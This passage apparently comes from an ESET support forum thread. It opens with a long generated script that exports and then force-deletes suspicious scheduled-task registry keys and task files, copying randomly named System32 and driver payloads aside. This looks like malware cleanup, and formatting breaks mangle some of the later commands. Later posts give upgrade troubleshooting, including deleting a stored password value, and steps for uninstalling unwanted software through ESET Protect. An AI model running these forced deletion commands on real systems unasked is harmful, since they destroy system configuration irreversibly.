copy /Y /B "C:\WINDOWS\System32\367D3749-2C54-4201-8143-349A5D20E5CC.ps1" "%UserProfile%\Desktop\findRegistryTaskCache\ID_4_TASK_2022.11.11_07.18.41.4500_ps1.pwsh"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7448EF08-93CA-48A1-83F0-96B6F59F99C8}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_5_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7448EF08-93CA-48A1-83F0-96B6F59F99C8}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\R1hjrhU\34A198CE-4B75-4D02-AC4D-E5A7FF71E0E4" "%UserProfile%\Desktop\findRegistryTaskCache\ID_5_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\R1hjrhU\34A198CE-4B75-4D02-AC4D-E5A7FF71E0E4" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\R1hjrhU\34A198CE-4B75-4D02-AC4D-E5A7FF71E0E4" "%UserProfile%\Desktop\findRegistryTaskCache\ID_5_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\R1hjrhU\34A198CE-4B75-4D02-AC4D-E5A7FF71E0E4" /f /q
copy /Y /B "C:\Windows\System32\wpUR1hjr\80307A32-6C94-463A-9BFD-AC3DE71A2D78" "%UserProfile%\Desktop\findRegistryTaskCache\ID_5_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\USxC3zQm\7CBD8B3A-B1DB-4932-8A2C-4541F2D4E1A9.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_5_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{83941100-FCF4-47DA-BEFE-0049AC97DE42}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_6_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{83941100-FCF4-47DA-BEFE-0049AC97DE42}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\C73681BE-B8AA-43D0-9F49-FE51DF358A49" "%UserProfile%\Desktop\findRegistryTaskCache\ID_6_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\C73681BE-B8AA-43D0-9F49-FE51DF358A49" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\C73681BE-B8AA-43D0-9F49-FE51DF358A49" "%UserProfile%\Desktop\findRegistryTaskCache\ID_6_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\C73681BE-B8AA-43D0-9F49-FE51DF358A49" /f /q
copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\9DB814C8-0DF0-4C12-854E-EAFE3CFD9C7C" "%UserProfile%\Desktop\findRegistryTaskCache\ID_6_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\1A62C9DE-33AF-4706-9D23-E134B115A644.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_6_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{853E2F39-0932-4CA3-A794-C93850DEEE0E}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_7_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{853E2F39-0932-4CA3-A794-C93850DEEE0E}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Customer Experience Improvement Program\UsbCeiprGIAcA1h" "%UserProfile%\Desktop\findRegistryTaskCache\ID_7_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Customer Experience Improvement Program\UsbCeiprGIAcA1h" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\UsbCeiprGIAcA1h" "%UserProfile%\Desktop\findRegistryTaskCache\ID_7_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\UsbCeiprGIAcA1h" /f /q
copy /Y /B "C:\WINDOWS\System32\0B0C5764-0946-4C57-BB56-FDF5374B8F6D.ps1" "%UserProfile%\Desktop\findRegistryTaskCache\ID_7_TASK_2022.11.11_07.18.41.4500_ps1.pwsh"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97E480C4-D23C-4064-8EC6-4BC175CD54D1}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_8_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97E480C4-D23C-4064-8EC6-4BC175CD54D1}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\26779417-AFA6-4DAE-AA1A-44AA0FD74A84" "%UserProfile%\Desktop\findRegistryTaskCache\ID_8_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\26779417-AFA6-4DAE-AA1A-44AA0FD74A84" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\26779417-AFA6-4DAE-AA1A-44AA0FD74A84" "%UserProfile%\Desktop\findRegistryTaskCache\ID_8_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\26779417-AFA6-4DAE-AA1A-44AA0FD74A84" /f /q
copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\6DE19372-27A2-4E43-9C1A-65A9C832D499" "%UserProfile%\Desktop\findRegistryTaskCache\ID_8_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\9EF6C255-3AC6-4342-9E31-12BDC6CF6897.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_8_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9A6010F4-0C5D-4B57-978D-975F94E223F1}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_9_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9A6010F4-0C5D-4B57-978D-975F94E223F1}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\49F2093E-007D-41BA-BEE9-01B95D44D16C" "%UserProfile%\Desktop\findRegistryTaskCache\ID_9_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\49F2093E-007D-41BA-BEE9-01B95D44D16C" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\49F2093E-007D-41BA-BEE9-01B95D44D16C" "%UserProfile%\Desktop\findRegistryTaskCache\ID_9_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\49F2093E-007D-41BA-BEE9-01B95D44D16C" /f /q
copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\E35D66F9-22B6-49BE-8CB6-117714CE782A" "%UserProfile%\Desktop\findRegistryTaskCache\ID_9_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\70742B98-5E81-4BFC-BF92-3C29CC0F0AA3.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_9_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AE54911A-0034-4FC0-9029-D0429C8B87EF}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_10_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AE54911A-0034-4FC0-9029-D0429C8B87EF}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers RoNGUDy" "%UserProfile%\Desktop\findRegistryTaskCache\ID_10_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers RoNGUDy" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers RoNGUDy" "%UserProfile%\Desktop\findRegistryTaskCache\ID_10_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers RoNGUDy" /f /q
copy /Y /B "C:\WINDOWS\System32\0y0ppope.gv3" "%UserProfile%\Desktop\findRegistryTaskCache\ID_10_TASK_2022.11.11_07.18.41.4500_gv3.pwsh"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B83E53D6-349E-4E6B-8442-A8A595BC0A3C}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_11_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B83E53D6-349E-4E6B-8442-A8A595BC0A3C}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\ll5p0b\1DBA922B-EA59-4033-B613-AB25BAB3F5FB" "%UserProfile%\Desktop\findRegistryTaskCache\ID_11_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\ll5p0b\1DBA922B-EA59-4033-B613-AB25BAB3F5FB" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\ll5p0b\1DBA922B-EA59-4033-B613-AB25BAB3F5FB" "%UserProfile%\Desktop\findRegistryTaskCache\ID_11_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\ll5p0b\1DBA922B-EA59-4033-B613-AB25BAB3F5FB" /f /q
copy /Y /B "C:\Windows\System32\3pVll\71900321-1D34-44C1-911F-2BBA328E0C99" "%UserProfile%\Desktop\findRegistryTaskCache\ID_11_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\p0bTx07Y\219FA918-B3BA-4354-A48D-E82802A4AE4D.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_11_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA0BA5A1-E541-4F72-89F4-D81A46A737D3}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_12_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA0BA5A1-E541-4F72-89F4-D81A46A737D3}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\6B03865C-9D57-4514-8164-4A866CAFF3B1" "%UserProfile%\Desktop\findRegistryTaskCache\ID_12_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\6B03865C-9D57-4514-8164-4A866CAFF3B1" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\6B03865C-9D57-4514-8164-4A866CAFF3B1" "%UserProfile%\Desktop\findRegistryTaskCache\ID_12_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\6B03865C-9D57-4514-8164-4A866CAFF3B1" /f /q
copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\E184E7F9-EAD9-4967-9A4B-C93407F62B41" "%UserProfile%\Desktop\findRegistryTaskCache\ID_12_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\D8DEA230-186E-47C9-A8B6-07A816746A19.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_12_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDFB972E-DCC2-49AB-A72A-9EA8C0794823}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_13_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDFB972E-DCC2-49AB-A72A-9EA8C0794823}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\sszCx\568614B6-D4F7-4CD5-B465-A09FD7BBFA1B" "%UserProfile%\Desktop\findRegistryTaskCache\ID_13_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\sszCx\568614B6-D4F7-4CD5-B465-A09FD7BBFA1B" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\sszCx\568614B6-D4F7-4CD5-B465-A09FD7BBFA1B" "%UserProfile%\Desktop\findRegistryTaskCache\ID_13_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\sszCx\568614B6-D4F7-4CD5-B465-A09FD7BBFA1B" /f /q
copy /Y /B "C:\Windows\System32\aHSss\43A5FAE3-33E7-4982-8684-B8065FCFA006" "%UserProfile%\Desktop\findRegistryTaskCache\ID_13_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\Cxu3rz\08DF9DFB-F4A3-47FE-992F-8287FCF6BDAF.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_13_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D8464CE5-A81C-4140-9B9B-59B939988C24}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_14_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D8464CE5-A81C-4140-9B9B-59B939988C24}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\FHquEokFN6\AEA353D3-B46C-43D7-880E-40B48A9CAA43" "%UserProfile%\Desktop\findRegistryTaskCache\ID_14_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\FHquEokFN6\AEA353D3-B46C-43D7-880E-40B48A9CAA43" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\FHquEokFN6\AEA353D3-B46C-43D7-880E-40B48A9CAA43" "%UserProfile%\Desktop\findRegistryTaskCache\ID_14_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\FHquEokFN6\AEA353D3-B46C-43D7-880E-40B48A9CAA43" /f /q
copy /Y /B "C:\Windows\System32\RGxFHquE\921B6482-0991-4094-9EB7-ADE85548C4E3" "%UserProfile%\Desktop\findRegistryTaskCache\ID_14_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\kFN64\6A082BD8-7372-4A26-B6CA-2347EDACF01F.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_14_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1B38B8D-AF08-45D0-A77F-1DAA99606315}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_15_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1B38B8D-AF08-45D0-A77F-1DAA99606315}" /f
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\O5kUNFdpt6\96D6023F-A7C8-4CDB-85D6-8B3E0DCAE1BD" "%UserProfile%\Desktop\findRegistryTaskCache\ID_15_TREE_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\O5kUNFdpt6\96D6023F-A7C8-4CDB-85D6-8B3E0DCAE1BD" /f
copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\O5kUNFdpt6\96D6023F-A7C8-4CDB-85D6-8B3E0DCAE1BD" "%UserProfile%\Desktop\findRegistryTaskCache\ID_15_TASK_2022.11.11_07.18.41.4500.file"
DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\O5kUNFdpt6\96D6023F-A7C8-4CDB-85D6-8B3E0DCAE1BD" /f /q
copy /Y /B "C:\Windows\System32\ax7O5kUNFd\60160BA7-3B5C-4B57-A5DF-E1F69A7B7685" "%UserProfile%\Desktop\findRegistryTaskCache\ID_15_TASK_2022.11.11_07.18.41.4500_exe.pwsh"
copy /Y /B "C:\Windows\System32\drivers\t6vhpw\E2B41A56-2C45-458E-957A-B86F057CAF95.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_15_TASK_2022.11.11_07.18.41.4500_sys.Script"
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EA281A96-9880-404A-B496-988804DC23EB}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_16_TASK_2022.11.11_07.18.41.4500.reg"
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
```
NT\CurrentVersion\Schedule\TaskCache\Tasks\{EA281A96-9880-404A-B496-988804DC23EB}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\9fksTdrJh\A7B9F301-80AE-4323-BD41-540D693A9615" "%UserProfile%\Desktop\findRegistryTaskCache\ID_16_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\9fksTdrJh\A7B9F301-80AE-4323-BD41-540D693A9615" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\9fksTdrJh\A7B9F301-80AE-4323-BD41-540D693A9615" "%UserProfile%\Desktop\findRegistryTaskCache\ID_16_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\9fksTdrJh\A7B9F301-80AE-4323-BD41-540D693A9615" /f /q copy /Y /B "C:\Windows\System32\6iE9f\54418D46-F18D-437C-9E28-C5D08A24C95D" "%UserProfile%\Desktop\findRegistryTaskCache\ID_16_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\sTdrJhGqL\3673DF21-9DB2-4277-A18F-8D8AFE4FD671.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_16_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F42C9D05-58DA-4AD7-8CC6-14C6EC247CD4}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_17_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F42C9D05-58DA-4AD7-8CC6-14C6EC247CD4}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\d0LVX\E35939A6-6C63-4F8A-8621-0106AE97D8CD" "%UserProfile%\Desktop\findRegistryTaskCache\ID_17_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\d0LVX\E35939A6-6C63-4F8A-8621-0106AE97D8CD" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\d0LVX\E35939A6-6C63-4F8A-8621-0106AE97D8CD" "%UserProfile%\Desktop\findRegistryTaskCache\ID_17_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\d0LVX\E35939A6-6C63-4F8A-8621-0106AE97D8CD" /f /q copy /Y /B "C:\Windows\System32\fP2d0LVXW\0D819F39-E78C-400C-B916-D26D34F7D0B5" "%UserProfile%\Desktop\findRegistryTaskCache\ID_17_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\uhNaua8twc\82655E2E-718D-49A1-AF54-4256D82E5096.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_17_TASK_2022.11.11_07.18.41.4500_sys.Script"
  12. @j-gray I'm thinking something has the old password cached or not being updated properly after a password change. Can you try running the 2 following commands to blank out the current password used by the EI Server?
First command backs up the registry key which contains this info.
Second command will delete the specific value which contains an encrypted copy of the password.
After running these commands and running the upgrade, when you get to the area asking for ESET Protect credentials, you will see the password is blanked out and you will be forced to type in the password manually.

Reg Export "HKEY_LOCAL_MACHINE\SOFTWARE\ESET\EnterpriseInspector\Server\CurrentVersion\Info" "%userprofile%\Desktop\EI_InfoKey_BKCP.reg"
Reg Delete "HKEY_LOCAL_MACHINE\SOFTWARE\ESET\EnterpriseInspector\Server\CurrentVersion\Info" /v "EraPassword"
  13. @j-gray Your permission sets look fine to me. And the logs showing "access denied" are due to how the EI Server communicates with the EP Server...but shouldn't be "access denied". I'm betting if you look inside of "%ProgramData%\ESET\RemoteAdministrator\Server\EraServerApplicationData\Logs\trace.txt", you will find some lines showing failed logins for the user. You would need to search for string "AuthenticateUser" without quotes.
After conferring with some people in our support team that have encountered and corrected this, I have possible solutions. Can you try these and let me know which help or don't help?

Solution 1 - Verify the EI account does not have "Password Change Required = Yes"
1. In ESET Protect, go to "More > Users"
2. Ensure you can see the user account you are using during the upgrade
3. Click the Gear in the top right and select "Edit Columns"
4. Find the "Password Change Required" and drag it to the right and put it so it is the second from the top.
5. Click OK
6. If "Password Change Required" shows Yes, change your user's password
7. Also verify the user is "Enabled"
8. Attempt to upgrade the EI server again
Even though you can still log into the EP server, it would be good to rule out there being a flag to change the password being present.

Solution 2 - Restart Two services on the ESET Protect server
1. On the ESET Protect Server, stop the following 2 services:
   - Apache Tomcat
   - ESET Protect Server
2. Once both services are fully stopped, start them back up in this order:
   - Apache Tomcat
   - ESET Protect Server
3. Attempt to upgrade the EI server again
The support team was adamant that both of the services need to be stopped, then started.
  14. Can you do me a favor and try the following?
1. Restart the ESET Protect service
2. Try your upgrade again
If it continues to be a pain:
1. Restart the ESET Inspect service
2. Try your upgrade again.
If that works, let me know. I may want to gather some logs from you. I think it may be a rare issue where the user account is treated as disabled in ESET Protect, even though it is not disabled. I'm not sure why this happens, and it's so rare that it's been really hard to narrow down the exact solution/workaround.
  15. For those managing multiple computers via ESET Protect, and would like a more streamlined way of removing this software from all computers, this can be done for the installed software, but not for the browser plugins. Browser plugins are managed by the individual browsers, and not directly by the OS.
These steps are not working 100% for the Bing Software mentioned in this thread. If I can improve upon this, I will post later.
Here are the steps to use ESET Protect to uninstall 3rd party software which can be seen by ESET. This will guide you through the following:
- Ensure ESET Protect can see installed non-ESET Applications
- Create a dynamic group to group all computers with unwanted applications
- Create tasks that will run...
  - ...anytime a computer has the undesired software installed and shows up in the dynamic group (thus uninstalling the unwanted software anytime a new computer joins this group)
  - ...one time on computers that already joined the group while you created the tasks (to uninstall the unwanted software from computers that had already joined this group)

I. Setup ESET Management Agent to report non-ESET Applications (only needed if not already configured)
1. In ESET Protect, navigate to "Policies > New Policy"
2. Name the policy "Report Non-ESET Applications"
3. In "Settings" ensure you select "ESET Management Agent" from the drop-down at the top
4. Expand "Advanced Settings" and locate and turn on "Report non-ESET-installed applications"
5. Assign to either the "All" group, or to specific groups/computers of desire.
6. Continue and finish creating the policy
At this point, it may take a bit for the non-ESET software to be reported to ESET Protect. Your endpoints will need to check in once to get the policy, then check in again to supply the new info, then ESET Protect will need to parse and put the info into the database. Default check in times are 10 minutes. So you should start seeing the non-ESET applications in about 30 minutes in the following area:

II. Check to see if ESET Protect sees the 3rd party applications:
1. In ESET Protect, open the details of an individual computer, then click on "Installed Applications"
2. If you can see Non-ESET applications, your settings are applied and working.
3. You can also check to see if your undesired software is visible and has a "Yes" in the column "Agent supports uninstall", which means ESET can attempt to uninstall this software

III. Create a dynamic group to group all computers with undesired software (this will help you see how many computers you have with the unwanted software, and allow for a quick way to uninstall the software)
1. In ESET Protect, click on Computers on the left, locate "Windows Computers" in the list of Groups.
2. Click on the gear to the right of this, and select "New Dynamic Group"
3. Name the group "Has Unwanted Software"
4. In the "Template" section, choose "New" and set the following:
   - Name: Unwanted Software
   - Expression: Operation: AND (All conditions have to be true)
   - Click Add Rule and choose: "Installed Software > Application Name", and click OK
   - Click Add Rule and choose: "Installed Software > Application Vendor", and click OK
   - For Application Name, set to "is one of" and fill in the name "Microsoft Bing Service"
   - In the Application Name section, click "Add" and then fill in the name "Bing Wallpaper"
   - For Application Vendor, set to "is one of", and fill in "Microsoft Corporation"
   - Should look like this:
5. Click Finish
Over a short time, you will see computers start to appear here. Next we will make a task to remove the undesired software.

IV. Create a task to start uninstalling unwanted software
